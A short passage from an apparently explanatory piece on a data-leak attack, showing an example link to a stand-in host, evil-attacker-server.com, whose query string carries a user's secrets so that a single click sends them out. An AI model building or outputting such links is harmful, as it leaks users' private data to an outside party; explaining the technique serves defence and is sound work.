Simply clicks the link. The trick here is that the link they are clicking on looks like this:

    https://evil-attacker-server.com/log-this?secrets=all+the+users+secrets+are+here

So clicking the link is enough to leak the secret data gathered by the attack.